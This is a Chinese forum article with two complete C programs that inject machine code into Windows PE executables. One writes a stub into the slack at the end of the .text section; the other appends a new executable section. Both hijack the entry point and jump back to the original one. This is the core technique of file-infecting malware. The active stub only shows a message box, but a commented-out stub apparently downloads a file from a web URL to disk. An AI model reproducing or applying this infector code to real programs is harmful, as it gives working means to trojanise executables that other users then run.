
[Visual Studio文章] 两种方式注入机器码 



PE插缝 和 PE添节（两种方式：把机器码写进 .text 节末尾的空隙，或者在文件末尾追加一个新节）  

PE插缝:

 
CODE:
//by 小浩 Q82602935
#include "stdafx.h"
#include <io.h>
#include <sys\stat.h>
#include <fcntl.h>
#include <stdio.h>



/* Everything GetPeInfo extracts from the target so WriteCodeTofile can place the
 * stub in the slack of section 0 (.text) and repoint the entry point at it. */
typedef struct tagPeInfo
{
        DWORD dwPeNewEntryAddress;   /* RVA of the stub = the new AddressOfEntryPoint (dwPeEntryoffset + dwPeCodeoffset) */
        DWORD dwPeOldEntryAddress;   /* original AddressOfEntryPoint (OEP); the stub's final jmp returns here */
        DWORD dwPePhysicalSize;      /* section 0 SizeOfRawData (bytes on disk) */
        DWORD dwPePhysicalAddress;   /* section 0 PointerToRawData (file offset) */
        DWORD dwPeVirtualSize;       /* section 0 Misc.VirtualSize (bytes of real code) */
        DWORD dwPeAddress;           /* e_lfanew: file offset of the "PE\0\0" signature */
        DWORD dwPegapsize;           /* slack between the end of the real code and the end of the section's raw data */
        DWORD dwPeCodeoffset;        /* (code section RVA) - (code section file offset): turns a file offset into an RVA */
        DWORD dwPeEntryoffset;       /* file offset where the stub is written: end of real code rounded up to 16 */
}PeInfo,*PPeInfo;


/* Flat view of the NT headers as they sit in the file; GetPeInfo casts this onto
 * the mapped image at e_lfanew.  Only section_header[0] is ever read (it must be
 * .text); the 6 is a fixed upper bound on the table and is never checked against
 * NumberOfSections.  IMAGE_OPTIONAL_HEADER resolves to the 32-bit layout when
 * the tool is built as a 32-bit program, so a PE32+ file does not map onto this
 * structure. */
typedef struct PE_HEADER_MAP
{
        DWORD Signature;                          /* "PE\0\0" */
        IMAGE_FILE_HEADER _head;
        IMAGE_OPTIONAL_HEADER opt_head;
        IMAGE_SECTION_HEADER section_header[6];   /* section table follows the optional header */
}peHeader;



/*unsigned char szHexCode[] = {0x6A ,0x40 ,0xE8 ,0x15 ,0x00 ,0x00 ,0x00 ,0xCE ,0xDE ,0xCC,
0xF5 ,0xBC ,0xFE ,0xCE ,0xAA ,0xC4 ,0xE3 ,0xA3 ,0xAC ,0xBB,
0xB6 ,0xD3 ,0xAD ,0xC4 ,0xFA ,0xA3 ,0xA1 ,0x00 ,0xE8 ,0x06 ,
0x00 ,0x00 ,0x00 ,0x68 ,0x65 ,0x6C ,0x6C ,0x6F ,0x00 ,0x6A ,
0x00 ,0xB8 ,0x8A ,0x05 ,0xD5 ,0x77 ,0xFF ,0xD0 ,0xe9 ,0x00 ,
                                                                 0x00 ,0x00 ,0x00 };
*/
/* 36-byte x86 stub written into the target.  Decoded (offsets in hex):
 *   00  6A 40            push 40h                 ; uType (MB_ICONINFORMATION)
 *   02  E8 06 00 00 00   call +6 -> 0D            ; pushes 07 = address of "x4h\0" (caption)
 *   07  78 34 68 00      db "x4h",0
 *   0B  EB 09            (never reached: the call above lands at 0D)
 *   0D  E8 04 00 00 00   call +4 -> 16            ; pushes 12 = address of "x4h\0" (text)
 *   12  78 34 68 00      db "x4h",0
 *   16  6A 00            push 0                   ; hWnd
 *   18  B8 8A 05 D5 77   mov eax, 77D5058Ah       ; absolute address, presumably MessageBoxA
 *   1D  FF D0            call eax
 *   1F  E9 xx xx xx xx   jmp rel32                ; operand (bytes 32..35) is patched by
 *                                                 ; WriteCodeTofile to land on the old OEP
 * The 0x77D5058A target is hard-coded: it only matches the user32.dll load
 * address on the machine this was written on and breaks on any other Windows
 * build or with ASLR.  The commented-out block in WriteCodeTofile resolved
 * MessageBoxA with GetProcAddress instead, which is the portable way. */
unsigned char szHexCode[]={0x6A,0x40,0xE8,0x06,0x00,0x00,0x00,0x78,
0x34,0x68,0x00,0xEB,0x09,0xE8,0x04,0x00,0x00,0x00,0x78,0x34,0x68,
0x00,0x6A,0x00,0xB8,0x8A,0x05,0xD5,0x77,0xFF,0xD0,0xe9,0x00,0x00,0x00,0x00};

/*
/*unsigned char szHexCode[]={
0x8B,0xF4,0x68,0x30,0xF0,0x41,0x00,0xFF,0x15,0x3C,
0x41,0x42,0x00,0x3B,0xF4,0xE8,0xA4,0x00,0x00,0x00,
0x89,0x45,0xFC,0x8B,0xF4,0x68,0x1C,0xF0,0x41,0x00,
0x8B,0x45,0xFC,0x50,0xFF,0x15,0x38,0x41,0x42,0x00,
0x3B,0xF4,0xE8,0x89,0x00,0x00,0x00,0x89,0x45,0xF8,
0x6A,0x00,0x6A,0x00,0xE8,0x07,0x00,0x00,0x00,0x63,
0x3A,0x5C,0x31,0x2E,0x67,0x00,0xE8,0x22,0x00,0x00,
0x00,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x77,0x77,
0x77,0x2E,0x62,0x61,0x69,0x64,0x75,0x2E,0x63,0x6F,
0x6D,0x2F,0x69,0x6D,0x67,0x2F,0x6C,0x6F,0x67,0x6F,
0x2E,0x67,0x69,0x66,0x00,0x6A,0x00,0xF8,0xFF,0xD0,
0xe9,0x00,0x00,0x00,0x00};
*/


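int GetPeInfo(void *vBasepointer,PPeInfo Peinfo)
{
   /*
    * Fill *Peinfo from the image mapped at vBasepointer: locate the NT headers,
    * require section 0 to be .text, and work out where in that section's slack
    * the stub can be written and what its RVA will be.
    * Returns 1 on success, 0 (after a MessageBox) on a malformed or unsupported file.
    *
    * NOTE(review): only the base pointer is passed in, not the mapped size, so
    * e_lfanew and the header structures are not bounds-checked against the file
    * length; a truncated or hostile file can still be read past its end here.
    */
   IMAGE_DOS_HEADER *iDosHeader=(IMAGE_DOS_HEADER*)vBasepointer;
   if(iDosHeader==NULL || iDosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
   {
           MessageBox(NULL,"Unknown type of file","Unknown type of file",NULL);
           return 0;
   }

   peHeader *pEheader=(peHeader*)((char*)iDosHeader+iDosHeader->e_lfanew);
   if(pEheader->Signature!=IMAGE_NT_SIGNATURE)
   {
           MessageBox(NULL,"Unknown type of file","Unknown type of file",NULL);
           return 0;
   }

   /* Only PE32 with at least one section: peHeader and the +40 patch offset used
      by WriteCodeTofile assume the 32-bit optional header, and the stub is x86. */
   if(pEheader->opt_head.Magic!=IMAGE_NT_OPTIONAL_HDR32_MAGIC
      || pEheader->_head.NumberOfSections==0)
   {
           MessageBox(NULL,"Unknown type of file","Unknown type of file",NULL);
           return 0;
   }

   IMAGE_SECTION_HEADER *pText=&pEheader->section_header[0];

   /* Name is 8 bytes with no guaranteed NUL, so a bounded compare replaces the
      original strstr(), which could run past the field. */
   if(memcmp(pText->Name,".text",5)!=0)
   {
           MessageBox(NULL,"Unknown type of file","Unknown type of file",NULL);
           return 0;
   }

   Peinfo->dwPeAddress=iDosHeader->e_lfanew;
   Peinfo->dwPeVirtualSize=pText->Misc.VirtualSize;        /* bytes of real code */
   Peinfo->dwPePhysicalAddress=pText->PointerToRawData;    /* file offset of the section */
   Peinfo->dwPePhysicalSize=pText->SizeOfRawData;          /* bytes on disk */

   /* The stub goes right after the real code, rounded up to a 16-byte boundary. */
   Peinfo->dwPeEntryoffset=pText->PointerToRawData+pText->Misc.VirtualSize;
   DWORD dwMods=Peinfo->dwPeEntryoffset%16;
   if(dwMods!=0)
   {
           Peinfo->dwPeEntryoffset+=(16-dwMods);
   }

   /* Usable slack = from that (aligned) offset to the end of the raw data.
      The original SizeOfRawData - VirtualSize wrapped to a huge value whenever
      VirtualSize > SizeOfRawData and ignored the alignment padding, so the
      caller's "enough room" check could pass when there was no room at all. */
   DWORD dwRawEnd=pText->PointerToRawData+pText->SizeOfRawData;
   Peinfo->dwPegapsize=(dwRawEnd>Peinfo->dwPeEntryoffset)
           ? dwRawEnd-Peinfo->dwPeEntryoffset : 0;

   /* RVA minus file offset for this section, used to turn the stub's file
      offset into its RVA.  The section's own VirtualAddress is used rather than
      OptionalHeader.BaseOfCode, which is not guaranteed to equal it. */
   Peinfo->dwPeCodeoffset=pText->VirtualAddress-Peinfo->dwPePhysicalAddress;

   Peinfo->dwPeOldEntryAddress=pEheader->opt_head.AddressOfEntryPoint;          /* OEP */
   Peinfo->dwPeNewEntryAddress=Peinfo->dwPeEntryoffset+Peinfo->dwPeCodeoffset;  /* stub RVA */
   return 1;
}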

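CString StrOfDWord(DWORD dwAddress)
{
        /*
         * Return the four little-endian bytes of dwAddress as a CString of
         * length exactly 4.  The original built the CString from an
         * unterminated unsigned char[4] through the LPCSTR constructor, which
         * stops at the first zero byte (truncating any value containing 0x00)
         * and otherwise reads past the array looking for one.  The
         * (LPCSTR, int) constructor copies exactly nLength bytes, embedded
         * zeros included, so GetAt(0..3) and a 4-byte memcpy from the result
         * are well defined.
         */
        unsigned char waddress[4];

        waddress[0]=(unsigned char)( dwAddress      &0xFF);
        waddress[1]=(unsigned char)((dwAddress>>8 ) &0xFF);
        waddress[2]=(unsigned char)((dwAddress>>16) &0xFF);
        waddress[3]=(unsigned char)((dwAddress>>24) &0xFF);

        return CString((LPCSTR)waddress,4);
}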

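/* Store v as four little-endian bytes at out[0..3]. */
static void PutDword(unsigned char out[4],DWORD v)
{
   out[0]=(unsigned char)( v      &0xFF);
   out[1]=(unsigned char)((v>>8 ) &0xFF);
   out[2]=(unsigned char)((v>>16) &0xFF);
   out[3]=(unsigned char)((v>>24) &0xFF);
}

int WriteCodeTofile(char szFilePath[],PPeInfo Peinfo)
{
   /*
    * Write the stub into the .text slack at Peinfo->dwPeEntryoffset and then
    * repoint AddressOfEntryPoint at it.  Peinfo comes from GetPeInfo and the
    * caller has already verified dwPegapsize >= sizeof(szHexCode).
    * Returns 1 on success, 0 (after a MessageBox) otherwise; the descriptor is
    * closed on every path.
    * The stub is written first and the entry point last, so a failure part-way
    * leaves the original entry point intact (an unused stub in the slack is
    * harmless).  The original patched the entry point first and could leave an
    * executable whose entry pointed at nothing.
    */
   int nTolen=sizeof(szHexCode);
   int nFd=-1;
   unsigned char szEntry[4];
   DWORD dwRel;
   const char *szError=NULL;

   /* _open() reports failure as -1; the original tested for 0, which is a
      valid descriptor. */
   nFd=_open(szFilePath,_O_RDWR | _O_CREAT | _O_BINARY,_S_IREAD | _S_IWRITE);
   if(nFd==-1)
   {
       MessageBox(NULL,"_open Error!","_open Error!",NULL);
       return 0;
   }

   /* Operand of the stub's final E9 jmp = OEP - (stub RVA + stub length); the
      unsigned wrap-around yields the right two's-complement rel32.  The operand
      is the last four bytes of the stub (index 32 for the 36-byte stub). */
   dwRel=Peinfo->dwPeOldEntryAddress-(Peinfo->dwPeNewEntryAddress+(DWORD)nTolen);
   PutDword(&szHexCode[nTolen-4],dwRel);

   if(_lseek(nFd,(long)Peinfo->dwPeEntryoffset,SEEK_SET)==-1)
   {
       szError="_lseek Error!";
   }
   else if(_write(nFd,szHexCode,nTolen)!=nTolen)   /* a short write is a failure */
   {
       szError="_write Error!";
   }
   /* e_lfanew + 4 (Signature) + 20 (IMAGE_FILE_HEADER) + 16 = file offset of
      IMAGE_OPTIONAL_HEADER32.AddressOfEntryPoint. */
   else if(_lseek(nFd,(long)Peinfo->dwPeAddress+40,SEEK_SET)==-1)
   {
       szError="_lseek Error!";
   }
   else
   {
       PutDword(szEntry,Peinfo->dwPeNewEntryAddress);
       if(_write(nFd,szEntry,4)!=4)
       {
           szError="_write Error!";
       }
   }

   if(_close(nFd)==-1 && szError==NULL)
   {
       szError="_close Error!";
   }
   if(szError!=NULL)
   {
       MessageBox(NULL,szError,szError,NULL);
       return 0;
   }
   return 1;
}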


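int InjectCodeToFile(char szFilePath[])
{
   /*
    * Map the target read-only, let GetPeInfo parse it, check that the .text
    * slack can hold the stub, then hand off to WriteCodeTofile.
    * Returns 1 on success, 0 (after a MessageBox) otherwise.  Unlike the
    * original, every handle and the view are released on the failure paths and
    * WriteCodeTofile's result is propagated instead of being discarded.
    */
   HANDLE hFile;
   HANDLE hMapping;
   void *vBasepointer;
   PeInfo pEinfo;
   int nRet;

   hFile=CreateFile(szFilePath,GENERIC_READ|GENERIC_WRITE,
           FILE_SHARE_READ|FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_FLAG_SEQUENTIAL_SCAN,0);
   if(hFile==INVALID_HANDLE_VALUE)
   {
           MessageBox(NULL,"CreateFile Error!","CreateFile Error!",NULL);
           return 0;
   }

   hMapping=CreateFileMapping(hFile,0,PAGE_READONLY | SEC_COMMIT,0,0,0);
   if(!hMapping)
   {
           MessageBox(NULL,"CreateFileMapping Error!","CreateFileMapping Error!",NULL);
           CloseHandle(hFile);
           return 0;
   }

   vBasepointer=MapViewOfFile(hMapping,FILE_MAP_READ,0,0,0);
   if(!vBasepointer)
   {
           MessageBox(NULL,"MapViewOfFile Error!","MapViewOfFile Error!",NULL);
           CloseHandle(hMapping);
           CloseHandle(hFile);
           return 0;
   }

   /* The mapped view keeps the mapping object alive, so the two handles can be
      closed here (as the original did) while the view is still used below. */
   CloseHandle(hFile);
   CloseHandle(hMapping);

   nRet=GetPeInfo(vBasepointer,&pEinfo);
   /* Unmap before reopening the file for writing; the original leaked the view
      when GetPeInfo failed. */
   UnmapViewOfFile(vBasepointer);
   if(!nRet)
   {
           return 0;
   }

   if(pEinfo.dwPegapsize<sizeof(szHexCode))
   {
           MessageBox(NULL,"No room to write the data!","No room to write the data!",NULL);
           return 0;
   }

   return WriteCodeTofile(szFilePath,&pEinfo);
}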



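void main()
{
        /*
         * Read the target path, keep a ".bak" copy next to it, then inject.
         * The original read the path with an unbounded "%s" (stack overflow
         * on a long line), could overflow the backup name, and went ahead
         * even when the backup copy failed.
         */
        char szFilePath[MAX_PATH];
        char szFileBak[MAX_PATH];

        printf("Please Input File Path:");
        /* Width = MAX_PATH-1 so the NUL terminator always fits. */
        if(scanf("%259s",szFilePath)!=1)
        {
                printf("No file path given!\r\n");
                return;
        }

        /* ".bak" is appended, so the name must leave room for it. */
        if(lstrlen(szFilePath)+4>=MAX_PATH)
        {
                printf("File path too long!\r\n");
                return;
        }
        lstrcpy(szFileBak,szFilePath);
        lstrcat(szFileBak,".bak");

        /* Refuse to modify the file without a backup (the add-section listing
           already checks this). */
        if(!CopyFile(szFilePath,szFileBak,FALSE))
        {
                printf("CopyFile Error!\r\n");
                return;
        }

        InjectCodeToFile(szFilePath);
}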

PE添节:

CODE:
//转载请注明 By 小浩  QQ:82602935
#include <afx.h>
#include <stdio.h>
#include <assert.h>


/* 36-byte x86 stub placed at the start of the new section.  Decoded (offsets in hex):
 *   00  6A 40            push 40h                 ; uType (MB_ICONINFORMATION)
 *   02  E8 06 00 00 00   call +6 -> 0D            ; pushes 07 = address of "x4h\0" (caption)
 *   07  78 34 68 00      db "x4h",0
 *   0B  EB 09            (never reached: the call above lands at 0D)
 *   0D  E8 04 00 00 00   call +4 -> 16            ; pushes 12 = address of "x4h\0" (text)
 *   12  78 34 68 00      db "x4h",0
 *   16  6A 00            push 0                   ; hWnd
 *   18  B8 8A 05 D5 77   mov eax, 77D5058Ah       ; absolute address, presumably MessageBoxA
 *   1D  FF D0            call eax
 *   1F  E9 xx xx xx xx   jmp rel32                ; operand (bytes 32..35) is patched in
 *                                                 ; main to land on the old OEP
 * The 0x77D5058A target is hard-coded: it only matches the user32.dll load
 * address on the machine this was written on and breaks on any other Windows
 * build or with ASLR. */
unsigned char szHexCode[]={0x6A,0x40,0xE8,0x06,0x00,0x00,0x00,0x78,
0x34,0x68,0x00,0xEB,0x09,0xE8,0x04,0x00,0x00,0x00,0x78,0x34,0x68,
    0x00,0x6A,0x00,0xB8,0x8A,0x05,0xD5,0x77,0xFF,0xD0,0xe9,0x00,0x00,0x00,0x00};


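CString StrOfDWord(DWORD dwAddress)
{
        /*
         * Return the four little-endian bytes of dwAddress as a CString of
         * length exactly 4.  The original built the CString from an
         * unterminated unsigned char[4] through the LPCSTR constructor, which
         * stops at the first zero byte (truncating any value containing 0x00)
         * and otherwise reads past the array looking for one.  The
         * (LPCSTR, int) constructor copies exactly nLength bytes, embedded
         * zeros included, so GetAt(0..3) on the result is well defined.
         */
        unsigned char waddress[4];

        waddress[0]=(unsigned char)( dwAddress      &0xFF);
        waddress[1]=(unsigned char)((dwAddress>>8 ) &0xFF);
        waddress[2]=(unsigned char)((dwAddress>>16) &0xFF);
        waddress[3]=(unsigned char)((dwAddress>>24) &0xFF);

        return CString((LPCSTR)waddress,4);
}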


/* Round size up to the next multiple of ALIGN_BASE (size itself when it is
 * already a multiple).  Used for FileAlignment / SectionAlignment rounding.
 * ALIGN_BASE must be non-zero (debug assert only). */
int Align(int size, int ALIGN_BASE)
{
        int remainder;

        assert( 0 != ALIGN_BASE );

        remainder = size % ALIGN_BASE;
        if (0 == remainder)
        {
                return size;
        }
        /* size - remainder is the multiple just below size; step up one unit. */
        return size - remainder + ALIGN_BASE;
}

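/* Size of the section appended to the file (the original's fixed 0x1000). */
static const DWORD NEW_SECTION_SIZE=0x1000;

/* CODE | EXECUTE | READ | WRITE == the original's 0xE0000020.  The stub never
   writes to its own section, so IMAGE_SCN_MEM_WRITE is kept only to match the
   original; an RX section would be the tighter choice. */
static const DWORD NEW_SECTION_CHARACTERISTICS=
        IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE;

/* Write cnt zero bytes at the current position; 1 on success, 0 on error. */
static int WriteZeros(FILE *pFile,long cnt)
{
        long i;
        for(i=0;i<cnt;i++)
        {
                if(fputc(0,pFile)==EOF)
                {
                        return 0;
                }
        }
        return 1;
}

/*
 * Append a new executable section ".x4h" holding szHexCode to the PE file open
 * (mode "rb+") on pFile and make it the entry point; the stub's final jmp is
 * patched to return to the old OEP.  Returns 1 on success, 0 after printing
 * why.  Nothing is written until every check has passed, and the raw data is
 * appended before the headers are rewritten, so a failure leaves either the
 * untouched file or one whose headers still describe the old layout.
 * The caller owns pFile and closes it.
 */
static int AddCodeSection(FILE *pFile)
{
        IMAGE_DOS_HEADER iMageDosHeader;
        IMAGE_NT_HEADERS iMageNtHeaders;
        IMAGE_SECTION_HEADER iMageLastSection;   /* last entry of the existing table */
        IMAGE_SECTION_HEADER iMageNewSection;
        long lFileSize,lSectionTable,lNewHeaderPos,lRawEnd;
        DWORD dwOldOEP,dwRel,dwRawFromSections,dwRawFromFileSize;
        int nNumOfSections,nFileAlignMent,nSectionAlignMent,i;

        if(fseek(pFile,0,SEEK_END)!=0 || (lFileSize=ftell(pFile))<0
           || fseek(pFile,0,SEEK_SET)!=0)
        {
                printf("fseek Error!\r\n");
                return 0;
        }

        /* Every fread is checked; the original used whatever was in the
           uninitialised struct when a read came up short. */
        if(fread(&iMageDosHeader,sizeof(IMAGE_DOS_HEADER),1,pFile)!=1
           || iMageDosHeader.e_magic!=IMAGE_DOS_SIGNATURE)
        {
                printf("Unknown type of file!\r\n");
                return 0;
        }

        if(fseek(pFile,iMageDosHeader.e_lfanew,SEEK_SET)!=0
           || fread(&iMageNtHeaders,sizeof(IMAGE_NT_HEADERS),1,pFile)!=1
           || iMageNtHeaders.Signature!=IMAGE_NT_SIGNATURE)
        {
                printf("Unknown type of file!\r\n");
                return 0;
        }

        /* Only PE32 with a full-size optional header: IMAGE_NT_HEADERS as read
           above is the 32-bit layout and is written back whole, and the stub
           is x86 code. */
        if(iMageNtHeaders.OptionalHeader.Magic!=IMAGE_NT_OPTIONAL_HDR32_MAGIC
           || iMageNtHeaders.FileHeader.SizeOfOptionalHeader<sizeof(IMAGE_OPTIONAL_HEADER))
        {
                printf("Not a PE32 file with a standard optional header!\r\n");
                return 0;
        }

        nNumOfSections=iMageNtHeaders.FileHeader.NumberOfSections;
        printf("%d Segment\r\n",nNumOfSections);
        if(nNumOfSections<1)
        {
                printf("File has no sections!\r\n");
                return 0;
        }

        nFileAlignMent=iMageNtHeaders.OptionalHeader.FileAlignment;
        nSectionAlignMent=iMageNtHeaders.OptionalHeader.SectionAlignment;
        printf("File Align Ment:%x\r\n",nFileAlignMent);
        printf("Section Align Ment:%x\r\n",nSectionAlignMent);
        if(nFileAlignMent<=0 || nSectionAlignMent<=0)
        {
                printf("Bad alignment values!\r\n");
                return 0;
        }

        dwOldOEP=iMageNtHeaders.OptionalHeader.AddressOfEntryPoint;
        printf("File OEP:%08x\r\n",dwOldOEP);

        /* The section table starts after the optional header, whose real length
           is SizeOfOptionalHeader (the original assumed sizeof(IMAGE_NT_HEADERS)). */
        lSectionTable=(long)iMageDosHeader.e_lfanew+4+(long)sizeof(IMAGE_FILE_HEADER)
                +iMageNtHeaders.FileHeader.SizeOfOptionalHeader;
        lNewHeaderPos=lSectionTable+nNumOfSections*(long)sizeof(IMAGE_SECTION_HEADER);

        /* The extra 40-byte header has to fit inside the header area; past
           SizeOfHeaders it would overwrite the first section's raw data. */
        if((DWORD)(lNewHeaderPos+sizeof(IMAGE_SECTION_HEADER))
           >iMageNtHeaders.OptionalHeader.SizeOfHeaders)
        {
                printf("No room for another section header!\r\n");
                return 0;
        }

        if(fseek(pFile,lSectionTable,SEEK_SET)!=0)
        {
                printf("fseek Error!\r\n");
                return 0;
        }
        for(i=0;i<nNumOfSections;i++)
        {
                if(fread(&iMageLastSection,sizeof(IMAGE_SECTION_HEADER),1,pFile)!=1)
                {
                        printf("fread Error!\r\n");
                        return 0;
                }
                /* Name is 8 bytes with no guaranteed NUL: bound the print. */
                printf("Segment name:%.8s\r\n",iMageLastSection.Name);
        }

        /* New section: virtually right after the last one; on disk at the later
           of the last section's raw end and the current end of file.  The
           original used only the former, which lands inside any data that
           follows the last section (an overlay such as a signature or an
           installer payload). */
        memset(&iMageNewSection,0,sizeof(IMAGE_SECTION_HEADER));
        memcpy(iMageNewSection.Name,".x4h",4);
        iMageNewSection.VirtualAddress=Align(iMageLastSection.VirtualAddress
                +iMageLastSection.Misc.VirtualSize,nSectionAlignMent);
        iMageNewSection.Misc.VirtualSize=Align(NEW_SECTION_SIZE,nSectionAlignMent);
        dwRawFromSections=Align(iMageLastSection.PointerToRawData
                +iMageLastSection.SizeOfRawData,nFileAlignMent);
        dwRawFromFileSize=Align(lFileSize,nFileAlignMent);
        iMageNewSection.PointerToRawData=(dwRawFromSections>dwRawFromFileSize)
                ?dwRawFromSections:dwRawFromFileSize;
        iMageNewSection.SizeOfRawData=Align(NEW_SECTION_SIZE,nFileAlignMent);
        iMageNewSection.Characteristics=NEW_SECTION_CHARACTERISTICS;
        assert(sizeof(szHexCode)<=NEW_SECTION_SIZE);

        /* Header updates, applied in memory and written to disk last. */
        iMageNtHeaders.FileHeader.NumberOfSections++;
        iMageNtHeaders.OptionalHeader.SizeOfCode=Align(iMageNtHeaders.OptionalHeader.SizeOfCode
                +NEW_SECTION_SIZE,nFileAlignMent);
        /* SizeOfImage = end of the new section rounded to SectionAlignment
           (the original added a fixed 0x1000 to the old value). */
        iMageNtHeaders.OptionalHeader.SizeOfImage=Align(iMageNewSection.VirtualAddress
                +iMageNewSection.Misc.VirtualSize,nSectionAlignMent);
        /* Kept from the original: the bound-import directory is dropped,
           presumably because its descriptors live in the header area right
           after the section table, where the new header is written. */
        iMageNtHeaders.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress = 0;
        iMageNtHeaders.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size = 0;
        iMageNtHeaders.OptionalHeader.AddressOfEntryPoint=iMageNewSection.VirtualAddress;

        /* Operand of the stub's final E9 jmp (its last four bytes): OEP minus
           the address following the jmp, i.e. new entry RVA + stub length; the
           unsigned wrap gives the right two's-complement displacement. */
        dwRel=dwOldOEP-(iMageNewSection.VirtualAddress+(DWORD)sizeof(szHexCode));
        szHexCode[sizeof(szHexCode)-4]=(unsigned char)( dwRel      &0xFF);
        szHexCode[sizeof(szHexCode)-3]=(unsigned char)((dwRel>>8 ) &0xFF);
        szHexCode[sizeof(szHexCode)-2]=(unsigned char)((dwRel>>16) &0xFF);
        szHexCode[sizeof(szHexCode)-1]=(unsigned char)((dwRel>>24) &0xFF);

        /* 1. Raw data: zero-fill from the current end of file through the end
              of the new section, then drop the stub at the section start. */
        lRawEnd=(long)(iMageNewSection.PointerToRawData+iMageNewSection.SizeOfRawData);
        if(fseek(pFile,lFileSize,SEEK_SET)!=0 || !WriteZeros(pFile,lRawEnd-lFileSize))
        {
                printf("fwrite Error!\r\n");
                return 0;
        }
        if(fseek(pFile,iMageNewSection.PointerToRawData,SEEK_SET)!=0
           || fwrite(szHexCode,1,sizeof(szHexCode),pFile)!=sizeof(szHexCode))
        {
                printf("fwrite Error!\r\n");
                return 0;
        }

        /* 2. Headers: the new section entry, then the NT headers. */
        if(fseek(pFile,lNewHeaderPos,SEEK_SET)!=0
           || fwrite(&iMageNewSection,sizeof(IMAGE_SECTION_HEADER),1,pFile)!=1)
        {
                printf("fwrite Error!\r\n");
                return 0;
        }
        if(fseek(pFile,iMageDosHeader.e_lfanew,SEEK_SET)!=0
           || fwrite(&iMageNtHeaders,sizeof(IMAGE_NT_HEADERS),1,pFile)!=1)
        {
                printf("fwrite Error!\r\n");
                return 0;
        }
        return 1;
}

void main()
{
        /*
         * Read the target path, keep a ".bak" copy next to it, then add the
         * section.  The original read the path with an unbounded "%s" (stack
         * overflow on a long line) and could overflow the backup name.
         */
        char szFilePath[MAX_PATH]={0};
        char szFilaBak[MAX_PATH]={0};
        FILE *pFile;
        int nOk;

        printf("Please Input FilePath:");
        /* Width = MAX_PATH-1 so the NUL terminator always fits. */
        if(scanf("%259s",szFilePath)!=1)
        {
                printf("No file path given!\r\n");
                return;
        }

        /* ".bak" is appended, so the name must leave room for it. */
        if(lstrlen(szFilePath)+4>=MAX_PATH)
        {
                printf("File path too long!\r\n");
                return;
        }
        lstrcpy(szFilaBak,szFilePath);
        lstrcat(szFilaBak,".bak");
        if(!CopyFile(szFilePath,szFilaBak,FALSE))
        {
                printf("CopyFile Error!\r\n");
                return;
        }

        pFile=fopen(szFilePath,"rb+");
        if(pFile==NULL)
        {
                printf("fopen Error!\r\n");
                return;
        }

        nOk=AddCodeSection(pFile);
        /* fclose() flushes the buffered header writes; if it fails the file on
           disk may be incomplete, so treat that as a failure too. */
        if(fclose(pFile)!=0)
        {
                printf("fclose Error!\r\n");
                nOk=0;
        }
        if(!nOk)
        {
                printf("Injection failed; the untouched copy is %s\r\n",szFilaBak);
        }
}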

